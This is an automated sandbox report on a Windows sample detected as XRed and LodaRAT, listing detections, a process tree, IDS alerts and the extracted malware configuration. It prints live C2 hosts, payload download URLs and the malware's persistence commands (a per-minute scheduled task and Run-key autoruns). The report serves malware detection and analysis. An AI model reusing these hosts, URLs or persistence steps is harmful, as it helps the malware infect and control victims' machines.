Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
222.exe

Overview

General Information

Sample name:222.exe
Analysis ID:1582332
MD5:71386f37f17778126296ca734975db6d
SHA1:353818dcd74d06565fc0e8ac4416e594d29ecd0b
SHA256:c1317da0fd0dc3d73b38634ea586016f6f651f52acc576fbae8b82721c83e9ae
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • 222.exe (PID: 4616 cmdline: "C:\Users\user\Desktop\222.exe" MD5: 71386F37F17778126296CA734975DB6D)
    • ._cache_222.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\._cache_222.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
      • cmd.exe (PID: 4668 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1732 cmdline: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 6048 cmdline: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 6192 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 8444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 10496 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 6764 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • EWZJGF.exe (PID: 2148 cmdline: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe MD5: 36F4C5372C6391F782C2DB490081746F)
  • EWZJGF.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
  • Synaptics.exe (PID: 7908 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • EWZJGF.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
  • EWZJGF.exe (PID: 5060 cmdline: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe" MD5: 36F4C5372C6391F782C2DB490081746F)
  • EWZJGF.exe (PID: 8588 cmdline: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe MD5: 36F4C5372C6391F782C2DB490081746F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
222.exeJoeSecurity_XRedYara detected XRedJoe Security
    222.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\HBMQLS.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\ProgramData\Synaptics\RCX6FEC.tmpJoeSecurity_XRedYara detected XRedJoe Security
          C:\ProgramData\Synaptics\RCX6FEC.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\Users\user\Documents\EEGWXUHVUG\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
              C:\Users\user\Documents\EEGWXUHVUG\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 2 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000007.00000002.3263095777.0000000002F18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                  00000007.00000002.3264154997.00000000032E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                      00000000.00000000.2014175538.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        00000003.00000003.2091728789.00000000006DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                          Click to see the 5 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.222.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.222.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potentially Suspicious Malware Callback Communication
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_222.exe, Initiated: true, ProcessId: 6036, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49733
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_222.exe, ProcessId: 6036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HBMQLS
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_222.exe, ProcessId: 6036, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HBMQLS.lnk
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, CommandLine: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4668, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn HBMQLS.exe /tr C:\Users\user\AppData\Roaming\Windata\EWZJGF.exe /sc minute /mo 1, ProcessId: 1732, ProcessName: schtasks.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_222.exe" , ParentImage: C:\Users\user\Desktop\._cache_222.exe, ParentProcessId: 6036, ParentProcessName: ._cache_222.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\HBMQLS.vbs, ProcessId: 6048, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\222.exe, ProcessId: 4616, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 6192, TargetFilename: C:\Users\user\AppData\Local\Temp\XJVR1Oh1.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:23:05.795485+010020448871A Network Trojan was detected192.168.2.549709142.250.186.110443TCP
                              2024-12-30T11:23:05.887437+010020448871A Network Trojan was detected192.168.2.549710142.250.186.110443TCP
                              2024-12-30T11:23:06.778768+010020448871A Network Trojan was detected192.168.2.549714142.250.186.110443TCP
                              2024-12-30T11:23:06.959783+010020448871A Network Trojan was detected192.168.2.549718142.250.186.110443TCP
                              2024-12-30T11:23:07.796755+010020448871A Network Trojan was detected192.168.2.549720142.250.186.110443TCP
                              2024-12-30T11:23:07.965147+010020448871A Network Trojan was detected192.168.2.549722142.250.186.110443TCP
                              2024-12-30T11:23:08.750160+010020448871A Network Trojan was detected192.168.2.549726142.250.186.110443TCP
                              2024-12-30T11:23:08.750257+010020448871A Network Trojan was detected192.168.2.549728142.250.186.110443TCP
                              2024-12-30T11:23:09.727637+010020448871A Network Trojan was detected192.168.2.549736142.250.186.110443TCP
                              2024-12-30T11:23:09.837082+010020448871A Network Trojan was detected192.168.2.549737142.250.186.110443TCP
                              2024-12-30T11:23:10.706964+010020448871A Network Trojan was detected192.168.2.549742142.250.186.110443TCP
                              2024-12-30T11:23:10.809718+010020448871A Network Trojan was detected192.168.2.549744142.250.186.110443TCP
                              2024-12-30T11:23:11.685563+010020448871A Network Trojan was detected192.168.2.549745142.250.186.110443TCP
                              2024-12-30T11:23:11.804812+010020448871A Network Trojan was detected192.168.2.549747142.250.186.110443TCP
                              2024-12-30T11:23:12.674533+010020448871A Network Trojan was detected192.168.2.549752142.250.186.110443TCP
                              2024-12-30T11:23:12.752833+010020448871A Network Trojan was detected192.168.2.549754142.250.186.110443TCP
                              2024-12-30T11:23:13.726436+010020448871A Network Trojan was detected192.168.2.549759142.250.186.110443TCP
                              2024-12-30T11:23:13.746094+010020448871A Network Trojan was detected192.168.2.549761142.250.186.110443TCP
                              2024-12-30T11:23:14.734629+010020448871A Network Trojan was detected192.168.2.549765142.250.186.110443TCP
                              2024-12-30T11:23:14.734634+010020448871A Network Trojan was detected192.168.2.549766142.250.186.110443TCP
                              2024-12-30T11:23:15.711791+010020448871A Network Trojan was detected192.168.2.549771142.250.186.110443TCP
                              2024-12-30T11:23:15.723739+010020448871A Network Trojan was detected192.168.2.549772142.250.186.110443TCP
                              2024-12-30T11:23:16.765381+010020448871A Network Trojan was detected192.168.2.549776142.250.186.110443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:23:08.462207+010028221161Malware Command and Control Activity Detected192.168.2.549733172.111.138.1005552TCP
                              2024-12-30T11:23:53.696742+010028221161Malware Command and Control Activity Detected192.168.2.550122172.111.138.1005552TCP
                              2024-12-30T11:24:44.315371+010028221161Malware Command and Control Activity Detected192.168.2.550192172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:23:05.801070+010028326171Malware Command and Control Activity Detected192.168.2.54971269.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550187172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.549976172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550184172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550193172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550122172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550192172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550190172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550191172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.549733172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.550075172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.549895172.111.138.1005552TCP
                              2024-12-30T11:22:53.186630+010028498851Malware Command and Control Activity Detected192.168.2.549787172.111.138.1005552TCP
                              2024-12-30T11:23:08.462207+010028498851Malware Command and Control Activity Detected192.168.2.549733172.111.138.1005552TCP
                              2024-12-30T11:23:17.473983+010028498851Malware Command and Control Activity Detected192.168.2.549787172.111.138.1005552TCP
                              2024-12-30T11:23:26.489788+010028498851Malware Command and Control Activity Detected192.168.2.549895172.111.138.1005552TCP
                              2024-12-30T11:23:35.662421+010028498851Malware Command and Control Activity Detected192.168.2.549976172.111.138.1005552TCP
                              2024-12-30T11:23:44.678862+010028498851Malware Command and Control Activity Detected192.168.2.550075172.111.138.1005552TCP
                              2024-12-30T11:23:53.696742+010028498851Malware Command and Control Activity Detected192.168.2.550122172.111.138.1005552TCP
                              2024-12-30T11:24:02.803353+010028498851Malware Command and Control Activity Detected192.168.2.550184172.111.138.1005552TCP
                              2024-12-30T11:24:12.073961+010028498851Malware Command and Control Activity Detected192.168.2.550187172.111.138.1005552TCP
                              2024-12-30T11:24:21.130302+010028498851Malware Command and Control Activity Detected192.168.2.550190172.111.138.1005552TCP
                              2024-12-30T11:24:35.083170+010028498851Malware Command and Control Activity Detected192.168.2.550191172.111.138.1005552TCP
                              2024-12-30T11:24:44.315371+010028498851Malware Command and Control Activity Detected192.168.2.550192172.111.138.1005552TCP
                              2024-12-30T11:24:53.349189+010028498851Malware Command and Control Activity Detected192.168.2.550193172.111.138.1005552TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 222.exeAvira: detected
                              Source: 222.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SSLLibrary.dlpAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SUpdate.iniH)OAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Local\Temp\HBMQLS.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Source: C:\ProgramData\Synaptics\RCX6FEC.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX6FEC.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: 222.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX6FEC.tmpReversingLabs: Detection: 91%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\Desktop\._cache_222.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1ReversingLabs: Detection: 91%
                              Multi AV Scanner detection for submitted file
                              Source: 222.exeVirustotal: Detection: 85%Perma Link
                              Source: 222.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.9% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\._cache_222.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Windata\EWZJGF.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Joe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCX6FEC.tmpJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 222.exeJoe Sandbox ML: detected
                              Source: 222.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49709 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49716 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49717 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49722 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49726 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49728 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49747 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49752 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49754 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49759 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49766 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49765 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49772 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49789 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49835 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49849 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49850 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49860 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49861 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49885 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49886 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49924 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49925 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.5:49930 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.5:49931 version: TLS 1.2
